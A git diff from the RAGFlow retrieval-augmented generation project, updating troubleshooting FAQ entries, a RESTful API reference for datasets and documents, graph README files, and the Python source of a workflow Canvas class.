> Each RAGFlow account can use **text-embedding-v2**, an embedding model of Tongyi-Qianwen, for free. This is why you can see Tongyi-Qianwen in the **Added models** list. You may need to update your Tongyi-Qianwen API key at a later point.

@ -212,3 +289,4 @@ Conversations in RAGFlow are based on a particular knowledge base or multiple kn

![](image)

![](image)

@ -14,13 +14,17 @@ https://demo.ragflow.io/v1/

## Authorization

All of RAGFlow's RESTful APIs use an API key for authorization, so keep it safe and do not expose it to the front end.
Put your API key in the request header.

```buildoutcfg
Authorization: Bearer {API_KEY}
```

:::note
In the current design, the RESTful API key you get from RAGFlow does not expire.
:::

To get your API key:

1. In RAGFlow, click the **Chat** tab in the middle top of the page.
@ -109,10 +113,10 @@ This method retrieves the history of a specified conversation session.

- `content_with_weight`: Content of the chunk.
- `doc_name`: Name of the *hit* document.
- `img_id`: The image ID of the chunk. It is an optional field only for PDF, PPTX, and images. Call ['GET' /document/get/\<id\>](#get-document-content) to retrieve the image.
- `positions`: [page_number, [upleft corner(x, y)], [right bottom(x, y)]], the chunk position, only for PDF.
- `similarity`: The hybrid similarity.
- `term_similarity`: The keyword similarity.
- `vector_similarity`: The embedding similarity.
- `doc_aggs`:
  - `doc_id`: ID of the *hit* document. Call ['GET' /document/get/\<id\>](#get-document-content) to retrieve the document.
  - `doc_name`: Name of the *hit* document.

@ -224,7 +228,7 @@ This method retrieves from RAGFlow the answer to the user's latest question.

|------------------|--------|----------|---------------|
| `conversation_id`| string | Yes      | The ID of the conversation session. Call ['GET' /new_conversation](#create-conversation) to retrieve the ID.|
| `messages`       | json   | Yes      | The latest question in a JSON form, such as `[{"role": "user", "content": "How are you doing!"}]`|
| `quote`          | bool   | No       | Default: false|
| `stream`         | bool   | No       | Default: true |
| `doc_ids`        | string | No       | Document IDs delimited by comma, like `c790da40ea8911ee928e0242ac180005,23dsf34ree928e0242ac180005`. The retrieved contents will be confined to these documents. |
@ -194,11 +194,7 @@ Ignore this warning and continue. All system warnings can be ignored.

![](image)

#### 4.3 Why does my document parsing stall at under one percent?

![](image)

@ -211,7 +207,7 @@ docker logs -f ragflow-server

2. Check if the **task_executor.py** process exists.
3. Check if your RAGFlow server can access hf-mirror.com or huggingface.com.

#### 4.4 Why does my pdf parsing stall near completion, while the log does not show any error?

If your RAGFlow is deployed *locally*, the parsing process is likely killed due to insufficient RAM. Try increasing your memory allocation by increasing the `MEM_LIMIT` value in **docker/.env**.
@ -225,17 +221,17 @@ If your RAGFlow is deployed *locally*, the parsing process is likely killed due

![](image)

#### 4.5 `Index failure`

An index failure usually indicates an unavailable Elasticsearch service.

#### 4.6 How to check the log of RAGFlow?

```bash
tail -f path_to_ragflow/docker/ragflow-logs/rag/*.log
```

#### 4.7 How to check the status of each component in RAGFlow?

```bash
$ docker ps
@ -249,7 +245,7 @@ d8c86f06c56b mysql:5.7.18 "docker-entrypoint.s…" 7 days ago Up
cd29bcb254bc quay.io/minio/minio:RELEASE.2023-12-20T01-00-02Z "/usr/bin/docker-ent…" 2 weeks ago Up 11 hours 0.0.0.0:9001->9001/tcp, :::9001->9001/tcp, 0.0.0.0:9000->9000/tcp, :::9000->9000/tcp ragflow-minio
```

#### 4.8 `Exception: Can't connect to ES cluster`

1. Check the status of your Elasticsearch component:
@ -276,26 +272,26 @@ $ docker ps

curl http://<IP_OF_ES>:<PORT_OF_ES>
```

#### 4.9 Can't start ES container and get `Elasticsearch did not exit normally`

This is because you forgot to update the `vm.max_map_count` value in **/etc/sysctl.conf** and your change to this value was reset after a system reboot.

#### 4.10 `{"data":null,"retcode":100,"retmsg":"<NotFound '404: Not Found'>"}`

Your IP address or port number may be incorrect. If you are using the default configurations, enter `http://<IP_OF_YOUR_MACHINE>` (**NOT 9380, AND NO PORT NUMBER REQUIRED!**) in your browser. This should work.

#### 4.11 `Ollama - Mistral instance running at 127.0.0.1:11434 but cannot add Ollama as model in RagFlow`

A correct Ollama IP address and port is crucial to adding models to Ollama:

- If you are on demo.ragflow.io, ensure that the server hosting Ollama has a publicly accessible IP address. Note that 127.0.0.1 is not a publicly accessible IP address.
- If you deploy RAGFlow locally, ensure that Ollama and RAGFlow are in the same LAN and can communicate with each other.

#### 4.12 Do you offer examples of using deepdoc to parse PDF or other files?

Yes, we do. See the Python files under the **rag/app** folder.

#### 4.13 Why did I fail to upload a 10MB+ file to my locally deployed RAGFlow?

You probably forgot to update the **MAX_CONTENT_LENGTH** environment variable:

@ -314,7 +310,7 @@ docker compose up ragflow -d
```
*Now you should be able to upload files of sizes less than 100MB.*

#### 4.14 `Table 'rag_flow.document' doesn't exist`

This exception occurs when starting up the RAGFlow server. Try the following:

@ -337,7 +333,7 @@ This exception occurs when starting up the RAGFlow server. Try the following:
docker compose up
```

#### 4.15 `hint : 102 Fail to access model Connection error`

![](image)

@ -345,7 +341,7 @@ This exception occurs when starting up the RAGFlow server. Try the following:

2. Do not forget to append **/v1/** to **http://IP:port**:
   **http://IP:port/v1/**

#### 4.16 `FileNotFoundError: [Errno 2] No such file or directory`

1. Check if the status of your minio container is healthy:
```bash
docs/references/ragflow_api.md (new file, 535 lines)
@ -0,0 +1,535 @@
---
sidebar_class_name: hidden
---

# API reference

RAGFlow offers RESTful APIs for you to integrate its capabilities into third-party applications.

## Base URL

```
http://<host_address>/api/v1/
```

## Dataset URL

```
http://<host_address>/api/v1/dataset
```

## Authorization

All of RAGFlow's RESTful APIs use an API key for authorization, so keep it safe and do not expose it to the front end.
Put your API key in the request header.

```buildoutcfg
Authorization: Bearer {API_KEY}
```

To get your API key:

1. In RAGFlow, click the **Chat** tab in the middle top of the page.
2. Hover over the corresponding dialogue **>** **Chat Bot API** to show the chatbot API configuration page.
3. Click **Api Key** **>** **Create new key** to create your API key.
4. Copy and keep your API key safe.
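
For illustration, a minimal Python sketch of an authorized call. The host address and key are placeholders, and `requests` is a third-party HTTP client; this is a sketch, not part of the official SDK:

```python
import requests

API_BASE = "http://127.0.0.1/api/v1"  # replace with your host address
API_KEY = "YOUR_API_KEY"              # the key created in the steps above

# Every request carries the API key in the Authorization header.
headers = {"Authorization": f"Bearer {API_KEY}"}

resp = requests.get(f"{API_BASE}/dataset", headers=headers)
print(resp.status_code, resp.json())
```
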
## Create dataset

This method creates a dataset for a specific user.

### Request

#### Request URI

| Method | Request URI |
|--------|-------------|
| POST   | `/dataset`  |

:::note
You are *required* to save the `data.dataset_id` value returned in the response data, as it is needed in all subsequent requests that operate on this dataset.
:::

#### Request parameter

| Name | Type | Required | Description |
|----------------|--------|----------|-------------|
| `dataset_name` | string | Yes      | The unique identifier assigned to each newly created dataset. `dataset_name` must be fewer than 2 ** 10 (1,024) characters and cannot be empty. The following character sets are supported: <br />- 26 lowercase English letters (a-z)<br />- 26 uppercase English letters (A-Z)<br />- 10 digits (0-9)<br />- "_", "-", "." |

### Response

```json
{
    "code": 0,
    "data": {
        "dataset_name": "kb1",
        "dataset_id": "375e8ada2d3c11ef98f93043d7ee537e"
    },
    "message": "success"
}
```
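
As a sketch, the same call from Python (host and key are placeholders, as above):

```python
import requests

resp = requests.post(
    "http://127.0.0.1/api/v1/dataset",
    headers={"Authorization": "Bearer YOUR_API_KEY"},
    json={"dataset_name": "kb1"},  # must satisfy the character-set rules above
)
dataset_id = resp.json()["data"]["dataset_id"]  # save this ID for later calls
```
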
## Get dataset list

This method lists the created datasets for a specific user.

### Request

#### Request URI

| Method | Request URI |
|--------|-------------|
| GET    | `/dataset`  |

### Response

#### Response parameter

```json
{
    "code": 0,
    "data": [
        {
            "avatar": null,
            "chunk_num": 0,
            "create_date": "Mon, 17 Jun 2024 16:00:05 GMT",
            "create_time": 1718611205876,
            "created_by": "b48110a0286411ef994a3043d7ee537e",
            "description": null,
            "doc_num": 0,
            "embd_id": "BAAI/bge-large-zh-v1.5",
            "id": "9bd6424a2c7f11ef81b83043d7ee537e",
            "language": "Chinese",
            "name": "dataset3(23)",
            "parser_config": {
                "pages": [
                    [
                        1,
                        1000000
                    ]
                ]
            },
            "parser_id": "naive",
            "permission": "me",
            "similarity_threshold": 0.2,
            "status": "1",
            "tenant_id": "b48110a0286411ef994a3043d7ee537e",
            "token_num": 0,
            "update_date": "Mon, 17 Jun 2024 16:00:05 GMT",
            "update_time": 1718611205876,
            "vector_similarity_weight": 0.3
        }
    ],
    "message": "List datasets successfully!"
}
```
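
A matching Python sketch for listing datasets (placeholders as before):

```python
import requests

resp = requests.get(
    "http://127.0.0.1/api/v1/dataset",
    headers={"Authorization": "Bearer YOUR_API_KEY"},
)
for ds in resp.json()["data"]:
    print(ds["id"], ds["name"])
```
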
## Delete dataset

This method deletes a dataset for a specific user.

### Request

#### Request URI

| Method | Request URI |
|--------|-------------------------|
| DELETE | `/dataset/{dataset_id}` |

#### Request parameter

| Name | Type | Required | Description |
|--------------|--------|----------|-------------|
| `dataset_id` | string | Yes      | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |

### Response

```json
{
    "code": 0,
    "message": "Remove dataset: 9cefaefc2e2611ef916b3043d7ee537e successfully"
}
```
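
A Python sketch of the delete call (IDs and key are placeholders):

```python
import requests

dataset_id = "9cefaefc2e2611ef916b3043d7ee537e"  # from the create/list response
resp = requests.delete(
    f"http://127.0.0.1/api/v1/dataset/{dataset_id}",
    headers={"Authorization": "Bearer YOUR_API_KEY"},
)
print(resp.json()["message"])
```
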
## Get the details of a specific dataset

This method gets the details of a specific dataset.

### Request

#### Request URI

| Method | Request URI |
|--------|-------------------------|
| GET    | `/dataset/{dataset_id}` |

#### Request parameter

| Name | Type | Required | Description |
|--------------|--------|----------|-------------|
| `dataset_id` | string | Yes      | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |

### Response

```json
{
    "code": 0,
    "data": {
        "avatar": null,
        "chunk_num": 0,
        "description": null,
        "doc_num": 0,
        "embd_id": "BAAI/bge-large-zh-v1.5",
        "id": "060323022e3511efa8263043d7ee537e",
        "language": "Chinese",
        "name": "test(1)",
        "parser_config": {
            "pages": [[1, 1000000]]
        },
        "parser_id": "naive",
        "permission": "me",
        "token_num": 0
    },
    "message": "success"
}
```
## Update the details of a specific dataset

This method updates the details of a specific dataset.

### Request

#### Request URI

| Method | Request URI |
|--------|-------------------------|
| PUT    | `/dataset/{dataset_id}` |

#### Request parameter

You are required to input at least one parameter.

| Name | Type | Required | Description |
|----------------------|--------|----------|-------------|
| `name`               | string | No       | The name of the knowledge base, from which you get the document list. |
| `description`        | string | No       | The description of the knowledge base. |
| `permission`         | string | No       | The permission for the knowledge base. Default: `me`. |
| `language`           | string | No       | The language of the knowledge base. |
| `chunk_method`       | string | No       | The chunk method of the knowledge base. |
| `embedding_model_id` | string | No       | The embedding model ID of the knowledge base. |
| `photo`              | string | No       | The photo of the knowledge base. |
| `layout_recognize`   | bool   | No       | Whether layout recognition is enabled for the knowledge base. |
| `token_num`          | int    | No       | The token number of the knowledge base. |
| `id`                 | string | No       | The ID of the knowledge base. |

### Response

#### Successful response

```json
{
    "code": 0,
    "data": {
        "avatar": null,
        "chunk_num": 0,
        "create_date": "Wed, 19 Jun 2024 20:33:34 GMT",
        "create_time": 1718800414518,
        "created_by": "b48110a0286411ef994a3043d7ee537e",
        "description": "new_description1",
        "doc_num": 0,
        "embd_id": "BAAI/bge-large-zh-v1.5",
        "id": "24f9f17a2e3811ef820e3043d7ee537e",
        "language": "English",
        "name": "new_name",
        "parser_config": {
            "pages": [[1, 1000000]]
        },
        "parser_id": "naive",
        "permission": "me",
        "similarity_threshold": 0.2,
        "status": "1",
        "tenant_id": "b48110a0286411ef994a3043d7ee537e",
        "token_num": 0,
        "update_date": "Wed, 19 Jun 2024 20:33:34 GMT",
        "update_time": 1718800414529,
        "vector_similarity_weight": 0.3
    },
    "message": "success"
}
```

#### Response for an operating error

```json
{
    "code": 103,
    "message": "Only the owner of knowledgebase is authorized for this operation!"
}
```

#### Response for no parameter

```json
{
    "code": 102,
    "message": "Please input at least one parameter that you want to update!"
}
```
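
A Python sketch of an update call, sending only the fields to change (IDs and key are placeholders):

```python
import requests

dataset_id = "24f9f17a2e3811ef820e3043d7ee537e"
resp = requests.put(
    f"http://127.0.0.1/api/v1/dataset/{dataset_id}",
    headers={"Authorization": "Bearer YOUR_API_KEY"},
    json={"name": "new_name", "description": "new_description1"},  # at least one field
)
print(resp.json())
```
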
---

## Upload documents

This method uploads documents for a specific user.

### Request

#### Request URI

| Method | Request URI |
|--------|-----------------------------------|
| POST   | `/dataset/{dataset_id}/documents` |

#### Request parameter

| Name | Type | Required | Description |
|--------------|--------|----------|-------------|
| `dataset_id` | string | Yes      | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |

### Response

#### Successful response

```json
{
    "code": 0,
    "data": [
        {
            "created_by": "b48110a0286411ef994a3043d7ee537e",
            "id": "859584a0379211efb1a23043d7ee537e",
            "kb_id": "8591349a379211ef92213043d7ee537e",
            "location": "test.txt",
            "name": "test.txt",
            "parser_config": {
                "pages": [
                    [1, 1000000]
                ]
            },
            "parser_id": "naive",
            "size": 0,
            "thumbnail": null,
            "type": "doc"
        },
        {
            "created_by": "b48110a0286411ef994a3043d7ee537e",
            "id": "8596f18c379211efb1a23043d7ee537e",
            "kb_id": "8591349a379211ef92213043d7ee537e",
            "location": "test1.txt",
            "name": "test1.txt",
            "parser_config": {
                "pages": [
                    [1, 1000000]
                ]
            },
            "parser_id": "naive",
            "size": 0,
            "thumbnail": null,
            "type": "doc"
        }
    ],
    "message": "success"
}
```

#### Response for nonexistent files

```json
{
    "code": "RetCode.DATA_ERROR",
    "message": "The file test_data/imagination.txt does not exist"
}
```

#### Response for nonexistent dataset

```json
{
    "code": 102,
    "message": "Can't find this dataset"
}
```

#### Response for the number of files exceeding the limit

```json
{
    "code": 102,
    "message": "You try to upload 512 files, which exceeds the maximum number of uploading files: 256"
}
```

#### Response for uploading without files

```json
{
    "code": 101,
    "message": "None is not string."
}
```
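
A minimal upload sketch in Python. The multipart form field name (`file`) is an assumption here, as is the host; verify it against your deployment before relying on it:

```python
import requests

dataset_id = "8591349a379211ef92213043d7ee537e"
with open("test.txt", "rb") as f:
    resp = requests.post(
        f"http://127.0.0.1/api/v1/dataset/{dataset_id}/documents",
        headers={"Authorization": "Bearer YOUR_API_KEY"},
        files=[("file", f)],  # "file" is an assumed form field name
    )
print(resp.json())
```
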
## Delete documents

This method deletes documents for a specific user.

### Request

#### Request URI

| Method | Request URI |
|--------|-------------------------------------------------|
| DELETE | `/dataset/{dataset_id}/documents/{document_id}` |

#### Request parameter

| Name | Type | Required | Description |
|---------------|--------|----------|-------------|
| `dataset_id`  | string | Yes      | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
| `document_id` | string | Yes      | The ID of the document. Call ['GET' /document](#list-documents) to retrieve the ID. |

### Response

#### Successful response

```json
{
    "code": 0,
    "data": true,
    "message": "success"
}
```

#### Response for deleting a document that does not exist

```json
{
    "code": 102,
    "message": "Document 111 not found!"
}
```

#### Response for deleting documents from a non-existent dataset

```json
{
    "code": 101,
    "message": "The document f7aba1ec379b11ef8e853043d7ee537e is not in the dataset: 000, but in the dataset: f7a7ccf2379b11ef83223043d7ee537e."
}
```
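
A Python sketch of deleting one document (IDs and key are placeholders):

```python
import requests

dataset_id = "8591349a379211ef92213043d7ee537e"
document_id = "859584a0379211efb1a23043d7ee537e"
resp = requests.delete(
    f"http://127.0.0.1/api/v1/dataset/{dataset_id}/documents/{document_id}",
    headers={"Authorization": "Bearer YOUR_API_KEY"},
)
print(resp.json())
```
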
## List documents

This method lists documents for a specific user.

### Request

#### Request URI

| Method | Request URI |
|--------|-----------------------------------|
| GET    | `/dataset/{dataset_id}/documents` |

#### Request parameter

| Name | Type | Required | Description |
|--------------|--------|----------|-------------|
| `dataset_id` | string | Yes      | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
| `offset`     | int    | No       | The start of the listed documents. Default: 0 |
| `count`      | int    | No       | The total count of the listed documents. Default: -1, meaning all documents from `offset` onward. |
| `order_by`   | string | No       | Default: `create_time` |
| `descend`    | bool   | No       | The order of listing documents. Default: True |
| `keywords`   | string | No       | Keywords used to filter the listed documents. Default: "" |

### Response

#### Successful response

```json
{
    "code": 0,
    "data": {
        "docs": [
            {
                "chunk_num": 0,
                "create_date": "Mon, 01 Jul 2024 19:24:10 GMT",
                "create_time": 1719833050046,
                "created_by": "b48110a0286411ef994a3043d7ee537e",
                "id": "6fb6f588379c11ef87023043d7ee537e",
                "kb_id": "6fb1c9e6379c11efa3523043d7ee537e",
                "location": "empty.txt",
                "name": "empty.txt",
                "parser_config": {
                    "pages": [
                        [1, 1000000]
                    ]
                },
                "parser_id": "naive",
                "process_begin_at": null,
                "process_duation": 0.0,
                "progress": 0.0,
                "progress_msg": "",
                "run": "0",
                "size": 0,
                "source_type": "local",
                "status": "1",
                "thumbnail": null,
                "token_num": 0,
                "type": "doc",
                "update_date": "Mon, 01 Jul 2024 19:24:10 GMT",
                "update_time": 1719833050046
            },
            {
                "chunk_num": 0,
                "create_date": "Mon, 01 Jul 2024 19:24:10 GMT",
                "create_time": 1719833050037,
                "created_by": "b48110a0286411ef994a3043d7ee537e",
                "id": "6fb59c60379c11ef87023043d7ee537e",
                "kb_id": "6fb1c9e6379c11efa3523043d7ee537e",
                "location": "test.txt",
                "name": "test.txt",
                "parser_config": {
                    "pages": [
                        [1, 1000000]
                    ]
                },
                "parser_id": "naive",
                "process_begin_at": null,
                "process_duation": 0.0,
                "progress": 0.0,
                "progress_msg": "",
                "run": "0",
                "size": 0,
                "source_type": "local",
                "status": "1",
                "thumbnail": null,
                "token_num": 0,
                "type": "doc",
                "update_date": "Mon, 01 Jul 2024 19:24:10 GMT",
                "update_time": 1719833050037
            }
        ],
        "total": 2
    },
    "message": "success"
}
```

#### Response for listing documents with IndexError

```json
{
    "code": 100,
    "message": "IndexError('Offset is out of the valid range.')"
}
```
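
A Python sketch of a paginated listing call (IDs and key are placeholders):

```python
import requests

dataset_id = "6fb1c9e6379c11efa3523043d7ee537e"
resp = requests.get(
    f"http://127.0.0.1/api/v1/dataset/{dataset_id}/documents",
    headers={"Authorization": "Bearer YOUR_API_KEY"},
    params={"offset": 0, "count": 10, "order_by": "create_time",
            "descend": True, "keywords": ""},
)
data = resp.json()["data"]
print(data["total"], [d["name"] for d in data["docs"]])
```
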
graph/README.md (new file, 45 lines)
@ -0,0 +1,45 @@
English | [简体中文](./README_zh.md)

# *Graph*

## Introduction

*Graph* is a mathematical concept composed of nodes and edges.
It is used to compose complex workflows or agents.
Unlike a DAG, this graph may contain cycles, so we can use loops to describe our agents or workflows.
Under this folder, we provide a test tool, ./test/client.py, which can run the DSLs, such as the JSON files in the folder ./test/dsl_examples.
Please use this client from the same folder in which you start RAGFlow. If RAGFlow is run by Docker, please go into the container before running the client.
Otherwise, a correct configuration in conf/service_conf.yaml is essential.

```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m

options:
  -h, --help            show this help message and exit
  -s DSL, --dsl DSL     input dsl
  -t TENANT_ID, --tenant_id TENANT_ID
                        Tenant ID
  -m, --stream          Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
</div>

## How to obtain a TENANT_ID on the command line?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 We plan to display it here in the near future.
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>

## How to set 'kb_ids' for component 'Retrieval' in DSL?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>
graph/README_zh.md (new file, 46 lines)
@ -0,0 +1,46 @@
[English](./README.md) | 简体中文

# *Graph*

## Introduction

"Graph" is a mathematical concept composed of nodes and edges.
It is used to build complex workflows or agents.
This graph goes beyond a DAG: we can use cycles to describe our agents or workflows.
Under this folder, we provide a test tool, ./test/client.py,
which can test DSL files like those under the folder ./test/dsl_examples.
Please use this client from the same folder in which you start RAGFlow. If RAGFlow runs via Docker, please enter the container before running the client.
Otherwise, correctly configuring the conf/service_conf.yaml file is essential.

```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m

options:
  -h, --help            show this help message and exit
  -s DSL, --dsl DSL     input dsl
  -t TENANT_ID, --tenant_id TENANT_ID
                        Tenant ID
  -m, --stream          Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
</div>

## How to obtain the TENANT_ID on the command line?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 It will be displayed here later:
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>

## How to fill in 'kb_ids' for the 'Retrieval' component in the DSL?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>
graph/__init__.py (new file, 0 lines)

graph/canvas.py (new file, 295 lines)
@ -0,0 +1,295 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import importlib
import json
import traceback
from abc import ABC
from copy import deepcopy
from functools import partial

import pandas as pd

from graph.component import component_class
from graph.component.base import ComponentBase
from graph.settings import flow_logger, DEBUG


class Canvas(ABC):
    """
    dsl = {
        "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {},
                },
                "downstream": ["answer_0"],
                "upstream": [],
            },
            "answer_0": {
                "obj": {
                    "component_name": "Answer",
                    "params": {}
                },
                "downstream": ["retrieval_0"],
                "upstream": ["begin", "generate_0"],
            },
            "retrieval_0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {}
                },
                "downstream": ["generate_0"],
                "upstream": ["answer_0"],
            },
            "generate_0": {
                "obj": {
                    "component_name": "Generate",
                    "params": {}
                },
                "downstream": ["answer_0"],
                "upstream": ["retrieval_0"],
            }
        },
        "history": [],
        "messages": [],
        "reference": [],
        "path": [["begin"]],
        "answer": []
    }
    """

    def __init__(self, dsl: str, tenant_id=None):
        self.path = []
        self.history = []
        self.messages = []
        self.answer = []
        self.components = {}
        self.dsl = json.loads(dsl) if dsl else {
            "components": {
                "begin": {
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "prologue": "Hi there!"
                        }
                    },
                    "downstream": [],
                    "upstream": []
                }
            },
            "history": [],
            "messages": [],
            "reference": [],
            "path": [],
            "answer": []
        }
        self._tenant_id = tenant_id
        self._embed_id = ""
        self.load()

    def load(self):
        self.components = self.dsl["components"]
        cpn_nms = set([])
        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])

        assert "Begin" in cpn_nms, "There must be a 'Begin' component."
        assert "Answer" in cpn_nms, "There must be an 'Answer' component."

        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])
            param = component_class(cpn["obj"]["component_name"] + "Param")()
            param.update(cpn["obj"]["params"])
            param.check()
            cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
            if cpn["obj"].component_name == "Categorize":
                for _, desc in param.category_description.items():
                    if desc["to"] not in cpn["downstream"]:
                        cpn["downstream"].append(desc["to"])

        self.path = self.dsl["path"]
        self.history = self.dsl["history"]
        self.messages = self.dsl["messages"]
        self.answer = self.dsl["answer"]
        self.reference = self.dsl["reference"]
        self._embed_id = self.dsl.get("embed_id", "")

    def __str__(self):
        self.dsl["path"] = self.path
        self.dsl["history"] = self.history
        self.dsl["messages"] = self.messages
        self.dsl["answer"] = self.answer
        self.dsl["reference"] = self.reference
        self.dsl["embed_id"] = self._embed_id
        dsl = {
            "components": {}
        }
        for k in self.dsl.keys():
            if k in ["components"]: continue
            dsl[k] = deepcopy(self.dsl[k])

        for k, cpn in self.components.items():
            if k not in dsl["components"]:
                dsl["components"][k] = {}
            for c in cpn.keys():
                if c == "obj":
                    dsl["components"][k][c] = json.loads(str(cpn["obj"]))
                    continue
                dsl["components"][k][c] = deepcopy(cpn[c])
        return json.dumps(dsl, ensure_ascii=False)

    def reset(self):
        self.path = []
        self.history = []
        self.messages = []
        self.answer = []
        self.reference = []
        for k, cpn in self.components.items():
            self.components[k]["obj"].reset()
        self._embed_id = ""

    def run(self, **kwargs):
        ans = ""
        if self.answer:
            cpn_id = self.answer[0]
            self.answer.pop(0)
            try:
                ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
            except Exception as e:
                ans = ComponentBase.be_output(str(e))
            self.path[-1].append(cpn_id)
            if kwargs.get("stream"):
                assert isinstance(ans, partial)
                return ans
            self.history.append(("assistant", ans.to_dict("records")))
            return ans

        if not self.path:
            self.components["begin"]["obj"].run(self.history, **kwargs)
            self.path.append(["begin"])

        self.path.append([])
        ran = -1

        def prepare2run(cpns):
            nonlocal ran, ans
            for c in cpns:
                cpn = self.components[c]["obj"]
                if cpn.component_name == "Answer":
                    self.answer.append(c)
                else:
                    if DEBUG: print("RUN: ", c)
                    ans = cpn.run(self.history, **kwargs)
                    self.path[-1].append(c)

            ran += 1

        prepare2run(self.components[self.path[-2][-1]]["downstream"])
        while 0 <= ran < len(self.path[-1]):
            if DEBUG: print(ran, self.path)
            cpn_id = self.path[-1][ran]
            cpn = self.get_component(cpn_id)
            if not cpn["downstream"]: break

            loop = self._find_loop()
            if loop: raise OverflowError(f"Too many loops: {loop}")

            if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
                switch_out = cpn["obj"].output()[1].iloc[0, 0]
                assert switch_out in self.components, \
                    "{}'s output: {} not valid.".format(cpn_id, switch_out)
                try:
                    prepare2run([switch_out])
                except Exception as e:
                    for p in [c for p in self.path for c in p][::-1]:
                        if p.lower().find("answer") >= 0:
                            self.get_component(p)["obj"].set_exception(e)
                            prepare2run([p])
                            break
                    traceback.print_exc()
                continue

            try:
                prepare2run(cpn["downstream"])
            except Exception as e:
                for p in [c for p in self.path for c in p][::-1]:
                    if p.lower().find("answer") >= 0:
                        self.get_component(p)["obj"].set_exception(e)
                        prepare2run([p])
                        break
                traceback.print_exc()

        if self.answer:
            cpn_id = self.answer[0]
            self.answer.pop(0)
            ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
            self.path[-1].append(cpn_id)
            if kwargs.get("stream"):
                assert isinstance(ans, partial)
                return ans

            self.history.append(("assistant", ans.to_dict("records")))

        return ans

    def get_component(self, cpn_id):
        return self.components[cpn_id]

    def get_tenant_id(self):
        return self._tenant_id

    def get_history(self, window_size):
        convs = []
        for role, obj in self.history[window_size * -2:]:
            convs.append({"role": role, "content": (obj if role == "user" else
                                                    '\n'.join(pd.DataFrame(obj)['content']))})
        return convs

    def add_user_input(self, question):
        self.history.append(("user", question))

    def set_embedding_model(self, embed_id):
        self._embed_id = embed_id

    def get_embedding_model(self):
        return self._embed_id

    def _find_loop(self, max_loops=2):
        path = self.path[-1][::-1]
        if len(path) < 2: return False

        for i in range(len(path)):
            if path[i].lower().find("answer") >= 0:
                path = path[:i]
                break

        if len(path) < 2: return False

        for l in range(2, len(path) // 2):
            pat = ",".join(path[0:l])
            path_str = ",".join(path)
            if len(pat) >= len(path_str): return False
            loop = max_loops
            while path_str.find(pat) == 0 and loop >= 0:
                loop -= 1
                if len(pat)+1 >= len(path_str):
                    return False
                path_str = path_str[len(pat)+1:]
            if loop < 0:
                pat = " => ".join([p.split(":")[0] for p in path[0:l]])
                return pat + " => " + pat

        return False
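
For illustration, a minimal sketch of driving `Canvas` directly, mirroring what graph/test/client.py does. The DSL file name and tenant ID below are placeholders, not part of the file above:

```python
# Hypothetical driver script (not part of canvas.py): load a DSL, ask one
# question, and print the answer. File path and tenant ID are placeholders.
from graph.canvas import Canvas

if __name__ == "__main__":
    with open("graph/test/dsl_examples/some_dsl.json") as f:  # placeholder path
        canvas = Canvas(f.read(), tenant_id="YOUR_TENANT_ID")
    canvas.add_user_input("What is RAGFlow?")
    ans = canvas.run(stream=False)  # a pandas DataFrame with a "content" column
    print(ans["content"].iloc[0])
    print(str(canvas))              # serialized DSL with history/path filled in
```
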
graph/component/__init__.py (new file, 19 lines)
@ -0,0 +1,19 @@
import importlib
from .begin import Begin, BeginParam
from .generate import Generate, GenerateParam
from .retrieval import Retrieval, RetrievalParam
from .answer import Answer, AnswerParam
from .categorize import Categorize, CategorizeParam
from .switch import Switch, SwitchParam
from .relevant import Relevant, RelevantParam
from .message import Message, MessageParam
from .rewrite import RewriteQuestion, RewriteQuestionParam
from .keyword import KeywordExtract, KeywordExtractParam
from .baidu import Baidu, BaiduParam
from .duckduckgosearch import DuckDuckGoSearch, DuckDuckGoSearchParam


